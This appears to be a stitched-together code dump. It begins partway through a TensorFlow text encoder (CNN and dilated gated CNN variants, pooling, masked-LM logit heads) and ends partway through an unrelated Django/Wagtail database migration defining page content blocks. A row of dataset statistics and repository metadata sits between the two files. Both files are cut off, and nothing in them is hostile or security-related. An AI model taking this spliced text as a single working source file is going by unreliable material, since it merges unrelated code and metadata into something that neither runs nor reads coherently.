                    use_bias=None,
                    activation=None,
                    kernel_initializer=tf.truncated_normal_initializer(stddev=0.01))
                tf.logging.info("==apply embedding linear projection==")
            self.sequence_output = textcnn_utils.resnet_cnn(sent_repres,
                            input_mask,
                            num_layers=self.config['cnn_num_layers'],
                            num_filters=self.config['cnn_num_filters'],
                            filter_sizes=self.config['cnn_filter_sizes'],
                            bn=self.config['bn'],
                            training=is_training,
                            timedistributed=False,
                            scope_name="textcnn",
                            reuse=False,
                            activation=tf.nn.relu,
                            gated_conv=self.config['cnn_gated_conv'],
                            residual=self.config['cnn_residual'])
            print(self.sequence_output.get_shape(), '=====sequence_output shape=====')
            pooled_output = []
            for pooling_method in self.config['pooling_method']:
                if pooling_method == 'avg':
                    seq_mask = tf.cast(mask, tf.float32)
                    avg_repres = tf.reduce_sum(self.sequence_output*seq_mask, axis=1)/(1e-10+tf.reduce_sum(seq_mask, axis=1))
                    pooled_output.append(avg_repres)
                    tf.logging.info("***** avg pooling *****")
                elif pooling_method == 'max':
                    seq_mask = tf.cast(mask, tf.float32)
                    max_avg = tf.reduce_max(qanet_layers.mask_logits(self.sequence_output, seq_mask), axis=1)
                    pooled_output.append(max_avg)
                    tf.logging.info("***** max pooling *****")
            self.output = tf.concat(pooled_output, axis=-1)
            tf.logging.info("***** seq-encoder *****")
        # --- dilated gated CNN (DGCNN), forward only ---
        elif kargs.get("cnn_type", 'textcnn') == 'dgcnn':
            input_shape = bert_utils.get_shape_list(sent_repres, expected_rank=3)
            hidden_size = self.config['cnn_num_filters'][0]
            input_width = input_shape[-1]
            # if input_width != hidden_size:
            #   sent_repres = tf.layers.dense(
            #           sent_repres,
            #           hidden_size,
            #           use_bias=None,
            #           activation=None,
            #           kernel_initializer=tf.truncated_normal_initializer(stddev=0.01))
            #   tf.logging.info("==apply embedding linear projection==")
            self.sequence_output = dgcnn_utils.dgcnn(
                            sent_repres,
                            input_mask,
                            num_layers=self.config['cnn_num_layers'],
                            dilation_rates=self.config.get('cnn_dilation_rates', [1,2]),
                            strides=self.config.get('cnn_dilation_rates', [1,1]),
                            num_filters=self.config.get('cnn_num_filters', [128,128]),
                            kernel_sizes=self.config.get('cnn_filter_sizes', [3,3]),
                            is_training=is_training,
                            scope_name="textcnn",
                            reuse=False,
                            activation=tf.nn.relu,
                            is_casual=self.config['is_casual'],
                            padding=self.config.get('padding', 'same')
                            )
            print(self.sequence_output.get_shape(), '=====sequence_output shape=====')
            print(mask.get_shape(), "===mask shape===")
            pooled_output = []
            for pooling_method in self.config['pooling_method']:
                if pooling_method == 'avg':
                    seq_mask = tf.cast(mask, tf.float32)
                    print(tf.reduce_sum(seq_mask, axis=1).get_shape(), "==avg seq shape")
                    avg_repres = tf.reduce_sum(self.sequence_output*seq_mask, axis=1)/(1e-10+tf.reduce_sum(seq_mask, axis=1))
                    pooled_output.append(avg_repres)
                    tf.logging.info("***** avg pooling *****")
                elif pooling_method == 'max':
                    seq_mask = tf.cast(mask, tf.float32)
                    max_avg = tf.reduce_max(qanet_layers.mask_logits(self.sequence_output, seq_mask), axis=1)
                    pooled_output.append(max_avg)
                    tf.logging.info("***** max pooling *****")
                elif pooling_method == "last":
                    last = esim_utils.last_relevant_output(self.sequence_output, input_len)
                    pooled_output.append(last)
                    tf.logging.info("***** last pooling *****")
            self.output = tf.concat(pooled_output, axis=-1)
            tf.logging.info("***** seq-encoder *****")
        # --- bidirectional DGCNN: separate forward and backward stacks ---
        elif kargs.get("cnn_type", 'textcnn') == 'bi_dgcnn':
            self.sequence_output = dgcnn_utils.dgcnn(
                            sent_repres,
                            input_mask,
                            num_layers=self.config['cnn_num_layers'],
                            dilation_rates=self.config.get('cnn_dilation_rates', [1,2]),
                            strides=self.config.get('cnn_dilation_rates', [1,1]),
                            num_filters=self.config.get('cnn_num_filters', [128,128]),
                            kernel_sizes=self.config.get('cnn_filter_sizes', [3,3]),
                            is_training=is_training,
                            scope_name="textcnn/forward",
                            reuse=False,
                            activation=tf.nn.relu,
                            is_casual=self.config['is_casual'],
                            padding=self.config.get('padding', 'same')
                            )
            self.sequence_output_backward = dgcnn_utils.backward_dgcnn(
                            sent_repres,
                            input_mask,
                            num_layers=self.config['cnn_num_layers'],
                            dilation_rates=self.config.get('cnn_dilation_rates', [1,2]),
                            strides=self.config.get('cnn_dilation_rates', [1,1]),
                            num_filters=self.config.get('cnn_num_filters', [128,128]),
                            kernel_sizes=self.config.get('cnn_filter_sizes', [3,3]),
                            is_training=is_training,
                            scope_name="textcnn/backward",
                            reuse=False,
                            activation=tf.nn.relu,
                            is_casual=self.config['is_casual'],
                            padding=self.config.get('padding', 'same')
                            )
            pooled_output = []
            # Causal mode shifts the two directions so each position only sees
            # context (forward drops the last 2 steps, backward the first 2).
            if self.config.get('is_casual', True):
                self.forward_backward_repres = tf.concat([self.sequence_output[:,:-2],
                                                    self.sequence_output_backward[:,2:]],
                                                    axis=-1)
                seq_mask = tf.cast(input_mask[:, 2:], dtype=tf.int32)
                tf.logging.info("***** casual concat *****")
            else:
                self.forward_backward_repres = tf.concat([self.sequence_output,
                                                    self.sequence_output_backward],
                                                    axis=-1)
                tf.logging.info("***** none-casual concat *****")
                seq_mask = tf.cast(input_mask, dtype=tf.int32)
            # for pooling_method in self.config['pooling_method']:
            #   if pooling_method == 'avg':
            #       seq_mask = tf.cast(mask[:, 1:-1, :], tf.float32)
            #       print(tf.reduce_sum(seq_mask, axis=1).get_shape(), "==avg seq shape")
            #       avg_repres = tf.reduce_sum(self.forward_backward_repres*seq_mask, axis=1)/(1e-10+tf.reduce_sum(seq_mask, axis=1))
            #       pooled_output.append(avg_repres)
            #       tf.logging.info("***** avg pooling *****")
            #   elif pooling_method == 'max':
            #       seq_mask = tf.cast(mask[:, 1:-1, :], tf.float32)
            #       max_avg = tf.reduce_max(qanet_layers.mask_logits(self.forward_backward_repres, seq_mask), axis=1)
            #       pooled_output.append(max_avg)
            #       tf.logging.info("***** max pooling *****")
            #   elif pooling_method == "last":
            #       last = esim_utils.last_relevant_output(self.forward_backward_repres, input_len-2)
            #       pooled_output.append(last)
            #       tf.logging.info("***** last pooling *****")
            input_mask = tf.cast(input_mask, tf.float32)
            for pooling_method in self.config['pooling_method']:
                if pooling_method == 'avg':
                    avg_repres = dgcnn_utils.mean_pooling(self.forward_backward_repres,
                                                        seq_mask)
                    pooled_output.append(avg_repres)
                    tf.logging.info("***** avg pooling *****")
                elif pooling_method == 'max':
                    max_repres = dgcnn_utils.max_pooling(self.forward_backward_repres,
                                                        seq_mask)
                    pooled_output.append(max_repres)
                    tf.logging.info("***** max pooling *****")
                elif pooling_method == 'last':
                    last_repres = dgcnn_utils.last_pooling(self.forward_backward_repres,
                                                        seq_mask)
                    pooled_output.append(last_repres)
                    tf.logging.info("***** last pooling *****")
                elif pooling_method == 'multidim_atten':
                    multidim_repres = dgcnn_utils.multidim_attention_pooling(
                                                        self.forward_backward_repres,
                                                        seq_mask,
                                                        is_training,
                                                        scope=None)
                    pooled_output.append(multidim_repres)
                    tf.logging.info("***** multidim_atten pooling *****")
            self.output = tf.concat(pooled_output, axis=-1)
        # --- bidirectional light-convolution DGCNN ---
        elif kargs.get("cnn_type", 'textcnn') == 'bi_light_dgcnn':
            self.sequence_output = light_conv_utils.dgcnn(
                            sent_repres,
                            input_mask,
                            num_layers=self.config['cnn_num_layers'],
                            dilation_rates=self.config.get('cnn_dilation_rates', [1,2]),
                            strides=self.config.get('cnn_dilation_rates', [1,1]),
                            num_filters=self.config.get('cnn_num_filters', [128,128]),
                            kernel_sizes=self.config.get('cnn_filter_sizes', [3,3]),
                            is_training=is_training,
                            scope_name="textcnn/forward",
                            reuse=False,
                            activation=tf.nn.relu,
                            is_casual=self.config['is_casual'],
                            padding=self.config.get('padding', 'same')
                            )
            self.sequence_output_backward = light_conv_utils.backward_dgcnn(
                            sent_repres,
                            input_mask,
                            num_layers=self.config['cnn_num_layers'],
                            dilation_rates=self.config.get('cnn_dilation_rates', [1,2]),
                            strides=self.config.get('cnn_dilation_rates', [1,1]),
                            num_filters=self.config.get('cnn_num_filters', [128,128]),
                            kernel_sizes=self.config.get('cnn_filter_sizes', [3,3]),
                            is_training=is_training,
                            scope_name="textcnn/backward",
                            reuse=False,
                            activation=tf.nn.relu,
                            is_casual=self.config['is_casual'],
                            padding=self.config.get('padding', 'same')
                            )
            pooled_output = []
            if self.config.get('is_casual', True):
                self.forward_backward_repres = tf.concat([self.sequence_output[:,:-2],
                                                    self.sequence_output_backward[:,2:]],
                                                    axis=-1)
                seq_mask = tf.cast(input_mask[:, 2:], dtype=tf.int32)
                tf.logging.info("***** casual concat *****")
            else:
                self.forward_backward_repres = tf.concat([self.sequence_output,
                                                    self.sequence_output_backward],
                                                    axis=-1)
                tf.logging.info("***** none-casual concat *****")
                seq_mask = tf.cast(input_mask, dtype=tf.int32)
            input_mask = tf.cast(input_mask, tf.float32)
            for pooling_method in self.config['pooling_method']:
                if pooling_method == 'avg':
                    avg_repres = dgcnn_utils.mean_pooling(self.forward_backward_repres,
                                                        seq_mask)
                    pooled_output.append(avg_repres)
                    tf.logging.info("***** avg pooling *****")
                elif pooling_method == 'max':
                    max_repres = dgcnn_utils.max_pooling(self.forward_backward_repres,
                                                        seq_mask)
                    pooled_output.append(max_repres)
                    tf.logging.info("***** max pooling *****")
                elif pooling_method == 'last':
                    last_repres = dgcnn_utils.last_pooling(self.forward_backward_repres,
                                                        seq_mask)
                    pooled_output.append(last_repres)
                    tf.logging.info("***** last pooling *****")
                elif pooling_method == 'multidim_atten':
                    multidim_repres = dgcnn_utils.multidim_attention_pooling(
                                                        self.forward_backward_repres,
                                                        seq_mask,
                                                        is_training,
                                                        scope=None)
                    pooled_output.append(multidim_repres)
                    tf.logging.info("***** multidim_atten pooling *****")
            self.output = tf.concat(pooled_output, axis=-1)
        # --- forward-only light-convolution DGCNN ---
        elif kargs.get("cnn_type", 'textcnn') == 'light_dgcnn':
            print("==cnn type==", kargs.get("cnn_type", 'textcnn'))
            self.sequence_output = light_conv_utils.dgcnn(
                            sent_repres,
                            input_mask,
                            num_layers=self.config['cnn_num_layers'],
                            dilation_rates=self.config.get('cnn_dilation_rates', [1,2]),
                            strides=self.config.get('cnn_dilation_rates', [1,1]),
                            num_filters=self.config.get('cnn_num_filters', [128,128]),
                            kernel_sizes=self.config.get('cnn_filter_sizes', [3,3]),
                            is_training=is_training,
                            scope_name="textcnn/forward",
                            reuse=False,
                            activation=tf.nn.relu,
                            is_casual=self.config['is_casual'],
                            padding=self.config.get('padding', 'same'),
                            layer_wise_pos=self.config.get('layer_wise_pos', False)
                            )
            pooled_output = []
            if self.config.get('is_casual', True):
                self.forward_backward_repres = self.sequence_output[:,:-2]
                seq_mask = tf.cast(input_mask[:, 2:], dtype=tf.int32)
                tf.logging.info("***** casual concat *****")
            else:
                self.forward_backward_repres = self.sequence_output
                tf.logging.info("***** none-casual concat *****")
                seq_mask = tf.cast(input_mask, dtype=tf.int32)
            input_mask = tf.cast(input_mask, tf.float32)
            for pooling_method in self.config['pooling_method']:
                if pooling_method == 'avg':
                    avg_repres = dgcnn_utils.mean_pooling(self.forward_backward_repres,
                                                        seq_mask)
                    pooled_output.append(avg_repres)
                    tf.logging.info("***** avg pooling *****")
                elif pooling_method == 'max':
                    max_repres = dgcnn_utils.max_pooling(self.forward_backward_repres,
                                                        seq_mask)
                    pooled_output.append(max_repres)
                    tf.logging.info("***** max pooling *****")
                elif pooling_method == 'last':
                    last_repres = dgcnn_utils.last_pooling(self.forward_backward_repres,
                                                        seq_mask)
                    pooled_output.append(last_repres)
                    tf.logging.info("***** last pooling *****")
                elif pooling_method == 'multidim_atten':
                    multidim_repres = dgcnn_utils.multidim_attention_pooling(
                                                        self.forward_backward_repres,
                                                        seq_mask,
                                                        is_training,
                                                        scope=None)
                    pooled_output.append(multidim_repres)
                    tf.logging.info("***** multidim_atten pooling *****")
            self.output = tf.concat(pooled_output, axis=-1)
        # elif kargs.get("cnn_type", 'textcnn') == 'dynamic_light_dgcnn':
        #   self.sequence_output = dynamic_dgcnn(
        #                   sent_repres,
        #                   input_mask,
        #                   num_attention_heads=self.config.get('num_attention_heads', 1),
        #                   size_per_head=self.config.get('size_per_head', 64),
        #                   query_act=None,
        #                   key_act=None,
        #                   value_act=None,
        #                   attention_probs_dropout_prob=self.config.get('attention_probs_dropout_prob', 0.2),
        #                   initializer_range=0.02,
        #                   do_return_2d_tensor=False,
        #                   batch_size=None,
        #                   from_seq_length=None,
        #                   attention_fixed_size=None,
        #                   dropout_name=None,
        #                   structural_attentions="none",
        #                   scale_ratio=self.config.get('scale_ratio', 1.0),
        #                   num_layers=self.config['cnn_num_layers'],
        #                   dilation_rates=self.config.get('cnn_dilation_rates', [1,2]),
        #                   strides=self.config.get('cnn_dilation_rates', [1,1]),
        #                   num_filters=self.config.get('cnn_num_filters', [128,128]),
        #                   kernel_sizes=self.config.get('cnn_filter_sizes', [3,3]),
        #                   is_training=is_training,
        #                   scope_name="textcnn/forward",
        #                   reuse=tf.AUTO_REUSE,
        #                   activation=tf.nn.relu,
        #                   is_casual=self.config['is_casual'],
        #                   padding=self.config.get('padding', 'same'),
        #                   layer_wise_pos=self.config.get('layer_wise_pos', False)
        #                   )
        #   pooled_output = []
        #   if self.config.get('is_casual', True):
        #       self.forward_backward_repres = self.sequence_output[:,:-2]
        #       seq_mask = tf.cast(input_mask[:, 2:], dtype=tf.int32)
        #       tf.logging.info("***** casual concat *****")
        #   else:
        #       self.forward_backward_repres = self.sequence_output
        #       tf.logging.info("***** none-casual concat *****")
        #       seq_mask = tf.cast(input_mask, dtype=tf.int32)
        #   input_mask = tf.cast(input_mask, tf.float32)
        #   for pooling_method in self.config['pooling_method']:
        #       if pooling_method == 'avg':
        #           avg_repres = dgcnn_utils.mean_pooling(self.forward_backward_repres,
        #                                               seq_mask)
        #           pooled_output.append(avg_repres)
        #           tf.logging.info("***** avg pooling *****")
        #       elif pooling_method == 'max':
        #           max_repres = dgcnn_utils.max_pooling(self.forward_backward_repres,
        #                                               seq_mask)
        #           pooled_output.append(max_repres)
        #           tf.logging.info("***** max pooling *****")
        #       elif pooling_method == 'last':
        #           last_repres = dgcnn_utils.last_pooling(self.forward_backward_repres,
        #                                               seq_mask)
        #           pooled_output.append(last_repres)
        #           tf.logging.info("***** last pooling *****")
        #       elif pooling_method == 'multidim_atten':
        #           multidim_repres = dgcnn_utils.multidim_attention_pooling(
        #                                               self.forward_backward_repres,
        #                                               seq_mask,
        #                                               is_training,
        #                                               scope=None)
        #           pooled_output.append(multidim_repres)
        #           tf.logging.info("***** multidim_atten pooling *****")
        #   self.output = tf.concat(pooled_output, axis=-1)
        # --- fallback: same as the plain textcnn branch ---
        else:
            self.sequence_output = None
            self.output = textcnn_utils.text_cnn_v1(sent_repres,
                    self.config.get("filter_size", [1,3,5]),
                    "textcnn",
                    sent_repres.get_shape()[-1],
                    self.config.num_filters,
                    max_pool_size=self.config.max_pool_size,
                    input_mask=input_mask)
            tf.logging.info("***** normal cnn *****")

    print("output shape====", self.output.get_shape())
def build_output_logits(self, **kargs):
    """Build the masked-LM output logits from ``self.sequence_output``.

    Projects the encoder's sequence output down to the embedding width,
    then scores every vocabulary token by multiplying against the
    embedding matrix ``self.emb_mat`` (weight tying with the input
    embeddings) and adding a learned per-token bias.

    Keyword Args:
        scope: optional variable-scope prefix; the head always lives under
            ``<scope>/cls/predictions`` (or bare ``cls/predictions``).
        embedding_projection: read but unused here — TODO confirm whether
            a projection path was planned.

    Side effects:
        Sets ``self.logits`` with shape (batch, seq, vocab_size).
    """
    input_tensor = self.sequence_output
    # get_shape_list with expected_rank=3 also validates that the input is
    # rank-3 (batch, seq, hidden); the unpacked dims are otherwise unused.
    input_shape_list = bert_utils.get_shape_list(self.sequence_output, expected_rank=3)
    batch_size = input_shape_list[0]
    seq_length = input_shape_list[1]
    hidden_dims = input_shape_list[2]
    embedding_projection = kargs.get('embedding_projection', None)
    scope = kargs.get('scope', None)
    if scope:
        scope = scope + '/' + 'cls/predictions'
    else:
        scope = 'cls/predictions'
    tf.logging.info("**** mlm generator scope **** %s", str(scope))
    # with tf.variable_scope("cls/predictions", reuse=tf.AUTO_REUSE):
    # AUTO_REUSE lets generator/discriminator style callers share this head.
    with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
        projection_width = self.config.emb_size
        with tf.variable_scope("transform"):
            # Dense transform down to the embedding width so the einsum
            # against emb_mat (vocab x emb_size) is well-shaped.
            input_tensor = tf.layers.dense(
                input_tensor,
                units=projection_width,
                activation=bert_modules.get_activation(self.config.hidden_act),
                kernel_initializer=bert_modules.create_initializer(
                    self.config.initializer_range))
        output_bias = tf.get_variable(
            "output_bias",
            shape=[self.config.vocab_size],
            initializer=tf.zeros_initializer())
        # batch x seq x embedding
        # (batch, seq, emb) x (vocab, emb) -> (batch, seq, vocab)
        logits = tf.einsum("abc,dc->abd", input_tensor, self.emb_mat)
        self.logits = tf.nn.bias_add(logits, output_bias)
def build_other_output_logits(self, sequence_output, **kargs):
    """Compute masked-LM logits for a caller-supplied sequence output.

    Same head as ``build_output_logits`` (shared via ``tf.AUTO_REUSE``),
    but operates on the given ``sequence_output`` tensor and *returns*
    the logits instead of storing them on ``self``.

    Args:
        sequence_output: rank-3 tensor (batch, seq, hidden); the rank is
            validated by ``bert_utils.get_shape_list``.

    Keyword Args:
        scope: optional variable-scope prefix for ``cls/predictions``.
        embedding_projection: accepted but unused — TODO confirm intent.

    Returns:
        A (batch, seq, vocab_size) logits tensor.
    """
    # Rank-3 validation; the individual dims are not needed afterwards.
    dims = bert_utils.get_shape_list(sequence_output, expected_rank=3)
    batch_size, seq_length, hidden_dims = dims[0], dims[1], dims[2]
    embedding_projection = kargs.get('embedding_projection', None)

    prefix = kargs.get('scope', None)
    head_scope = (prefix + '/' + 'cls/predictions') if prefix else 'cls/predictions'
    tf.logging.info("**** mlm generator scope **** %s", str(head_scope))

    with tf.variable_scope(head_scope, reuse=tf.AUTO_REUSE):
        with tf.variable_scope("transform"):
            # Project hidden states to the embedding width before scoring
            # them against the (tied) embedding matrix.
            transformed = tf.layers.dense(
                sequence_output,
                units=self.config.emb_size,
                activation=bert_modules.get_activation(self.config.hidden_act),
                kernel_initializer=bert_modules.create_initializer(
                    self.config.initializer_range))
        bias = tf.get_variable(
            "output_bias",
            shape=[self.config.vocab_size],
            initializer=tf.zeros_initializer())
        # (batch, seq, emb) x (vocab, emb) -> (batch, seq, vocab)
        scores = tf.einsum("abc,dc->abd", transformed, self.emb_mat)
        return tf.nn.bias_add(scores, bias)
def build_backward_output_logits(self, **kargs):
    """Build masked-LM logits for the backward-direction sequence output.

    Mirror of ``build_output_logits`` but reads
    ``self.sequence_output_backward`` and stores the result in
    ``self.backward_logits``. Variables are shared with the forward head
    through ``tf.AUTO_REUSE`` on the same ``cls/predictions`` scope.

    Keyword Args:
        scope: optional variable-scope prefix for ``cls/predictions``.
        embedding_projection: read but unused here — TODO confirm intent.

    Side effects:
        Sets ``self.backward_logits`` with shape (batch, seq, vocab_size).
    """
    input_tensor = self.sequence_output_backward
    # expected_rank=3 validates a (batch, seq, hidden) input; the unpacked
    # dims below are otherwise unused.
    input_shape_list = bert_utils.get_shape_list(self.sequence_output_backward, expected_rank=3)
    batch_size = input_shape_list[0]
    seq_length = input_shape_list[1]
    hidden_dims = input_shape_list[2]
    embedding_projection = kargs.get('embedding_projection', None)
    scope = kargs.get('scope', None)
    if scope:
        scope = scope + '/' + 'cls/predictions'
    else:
        scope = 'cls/predictions'
    tf.logging.info("**** mlm generator scope **** %s", str(scope))
    # with tf.variable_scope("cls/predictions", reuse=tf.AUTO_REUSE):
    with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
        projection_width = self.config.emb_size
        with tf.variable_scope("transform"):
            # Dense transform down to embedding width for the tied-weight
            # einsum against emb_mat.
            input_tensor = tf.layers.dense(
                input_tensor,
                units=projection_width,
                activation=bert_modules.get_activation(self.config.hidden_act),
                kernel_initializer=bert_modules.create_initializer(
                    self.config.initializer_range))
        output_bias = tf.get_variable(
            "output_bias",
            shape=[self.config.vocab_size],
            initializer=tf.zeros_initializer())
        # batch x seq x embedding
        # (batch, seq, emb) x (vocab, emb) -> (batch, seq, vocab)
        logits = tf.einsum("abc,dc->abd", input_tensor, self.emb_mat)
        self.backward_logits = tf.nn.bias_add(logits, output_bias)
def get_pooled_output(self, **kargs):
    """Return the pooled (sentence-level) representation, ``self.output``."""
    return self.output
def put_task_output(self, input_repres, **kargs):
    """Store a task-specific representation for later retrieval."""
    self.task_repres = input_repres
def get_task_output(self, **kargs):
    """Return the representation previously stored by ``put_task_output``."""
    return self.task_repres
def get_sequence_output(self, **kargs):
    """Return the per-token sequence output, ``self.sequence_output``."""
    return self.sequence_output
def get_embedding_table(self, **kargs):
    """Return the token embedding matrix, ``self.emb_mat``."""
    return self.emb_mat
def get_embedding_projection_table(self, **kargs):
    """Return None: this model uses no separate embedding projection table."""
    return None
def get_sequence_output_logits(self, **kargs):
    """Return the (forward) MLM logits set by ``build_output_logits``."""
    return self.logits
def get_sequence_backward_output_logits(self, **kargs):
    """Return the backward MLM logits set by ``build_backward_output_logits``."""
    return self.backward_logits
| 42.057692 | 121 | 0.652281 | 3,662 | 28,431 | 4.773894 | 0.05953 | 0.06807 | 0.038668 | 0.025626 | 0.861629 | 0.843382 | 0.83463 | 0.822618 | 0.818327 | 0.801339 | 0 | 0.011596 | 0.208364 | 28,431 | 675 | 122 | 42.12 | 0.76514 | 0.14646 | 0 | 0.780952 | 0 | 0 | 0.132045 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024762 | false | 0 | 0.024762 | 0.013333 | 0.066667 | 0.015238 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d66b56d17013793ba1c7cba1a09d7d5317ada56e | 62,733 | py | Python | app/modules/core/migrations/0001_initial.py | nickmoreton/nhsx-website | 2397d1308376c02b75323d30e6bc916af0daac9d | [
"MIT"
] | 50 | 2019-04-04T17:50:00.000Z | 2021-08-05T15:08:37.000Z | app/modules/core/migrations/0001_initial.py | nickmoreton/nhsx-website | 2397d1308376c02b75323d30e6bc916af0daac9d | [
"MIT"
] | 434 | 2019-04-04T18:25:32.000Z | 2022-03-31T18:23:37.000Z | app/modules/core/migrations/0001_initial.py | nhsx-mirror/nhsx-website | 2133b4e275ca35ff77f7d6874e809f139ec4bf86 | [
"MIT"
] | 23 | 2019-04-04T09:52:07.000Z | 2021-04-11T07:41:47.000Z | # Generated by Django 3.0.4 on 2020-04-01 13:46
from django.db import migrations, models
import django.db.models.deletion
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
import wagtailnhsukfrontend.blocks
class Migration(migrations.Migration):
initial = True
dependencies = [
("wagtailcore", "0045_assign_unlock_grouppagepermission"),
]
operations = [
migrations.CreateModel(
name="ArticlePage",
fields=[
(
"page_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="wagtailcore.Page",
),
),
(
"body",
wagtail.core.fields.StreamField(
[
(
"image_block",
wagtail.core.blocks.StructBlock(
[
(
"content_image",
wagtail.images.blocks.ImageChooserBlock(
required=True
),
),
(
"alt_text",
wagtail.core.blocks.CharBlock(
help_text="Only leave this blank if the image is decorative.",
required=False,
),
),
(
"caption",
wagtail.core.blocks.CharBlock(
required=False
),
),
]
),
),
(
"panel_block",
wagtail.core.blocks.StructBlock(
[
(
"label",
wagtail.core.blocks.CharBlock(
required=False
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
(
"promo_block",
wagtail.core.blocks.StructBlock(
[
(
"url",
wagtail.core.blocks.URLBlock(
label="URL", required=True
),
),
(
"heading",
wagtail.core.blocks.CharBlock(
required=True
),
),
(
"description",
wagtail.core.blocks.CharBlock(
required=False
),
),
(
"content_image",
wagtail.images.blocks.ImageChooserBlock(
label="Image", required=False
),
),
(
"alt_text",
wagtail.core.blocks.CharBlock(
required=False
),
),
(
"size",
wagtail.core.blocks.ChoiceBlock(
choices=[
("", "Default"),
("small", "Small"),
],
required=False,
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
]
),
),
(
"expander_block",
wagtail.core.blocks.StructBlock(
[
(
"title",
wagtail.core.blocks.CharBlock(
required=True
),
),
(
"body",
wagtail.core.blocks.StreamBlock(
[
(
"richtext",
wagtail.core.blocks.RichTextBlock(),
),
(
"action_link",
wagtail.core.blocks.StructBlock(
[
(
"text",
wagtail.core.blocks.CharBlock(
label="Link text",
required=True,
),
),
(
"external_url",
wagtail.core.blocks.URLBlock(
label="URL",
required=True,
),
),
(
"new_window",
wagtail.core.blocks.BooleanBlock(
label="Open in new window",
required=False,
),
),
]
),
),
(
"inset_text",
wagtail.core.blocks.StructBlock(
[
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
)
]
),
),
(
"image",
wagtail.core.blocks.StructBlock(
[
(
"content_image",
wagtail.images.blocks.ImageChooserBlock(
required=True
),
),
(
"alt_text",
wagtail.core.blocks.CharBlock(
help_text="Only leave this blank if the image is decorative.",
required=False,
),
),
(
"caption",
wagtail.core.blocks.CharBlock(
required=False
),
),
]
),
),
(
"grey_panel",
wagtail.core.blocks.StructBlock(
[
(
"label",
wagtail.core.blocks.CharBlock(
label="heading",
required=False,
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Ignore this if there is no heading. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
(
"warning_callout",
wagtail.core.blocks.StructBlock(
[
(
"title",
wagtail.core.blocks.CharBlock(
default="Important",
required=True,
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
required=True,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
(
"summary_list",
wagtail.core.blocks.StructBlock(
[
(
"rows",
wagtail.core.blocks.ListBlock(
wagtailnhsukfrontend.blocks.SummaryListRowBlock
),
),
(
"no_border",
wagtail.core.blocks.BooleanBlock(
default=False,
required=False,
),
),
]
),
),
],
required=True,
),
),
]
),
),
(
"grey_panel_block",
wagtail.core.blocks.StructBlock(
[
(
"label",
wagtail.core.blocks.CharBlock(
label="heading", required=False
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Ignore this if there is no heading. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
(
"inset_text_block",
wagtail.core.blocks.StructBlock(
[
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
)
]
),
),
(
"panel_list_block",
wagtail.core.blocks.StructBlock(
[
(
"panels",
wagtail.core.blocks.ListBlock(
wagtail.core.blocks.StructBlock(
[
(
"left_panel",
wagtail.core.blocks.StructBlock(
[
(
"label",
wagtail.core.blocks.CharBlock(
required=False
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
(
"right_panel",
wagtail.core.blocks.StructBlock(
[
(
"label",
wagtail.core.blocks.CharBlock(
required=False
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
]
)
),
)
]
),
),
(
"promo_group_block",
wagtail.core.blocks.StructBlock(
[
(
"column",
wagtail.core.blocks.ChoiceBlock(
choices=[
("one-half", "One-half"),
("one-third", "One-third"),
]
),
),
(
"size",
wagtail.core.blocks.ChoiceBlock(
choices=[
("", "Default"),
("small", "Small"),
],
required=False,
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"promos",
wagtail.core.blocks.ListBlock(
wagtailnhsukfrontend.blocks.BasePromoBlock
),
),
]
),
),
(
"warning_callout_block",
wagtail.core.blocks.StructBlock(
[
(
"title",
wagtail.core.blocks.CharBlock(
default="Important", required=True
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
required=True,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
],
blank=True,
verbose_name="Body blocks",
),
),
],
options={"abstract": False,},
bases=("wagtailcore.page",),
),
migrations.CreateModel(
name="SectionPage",
fields=[
(
"page_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
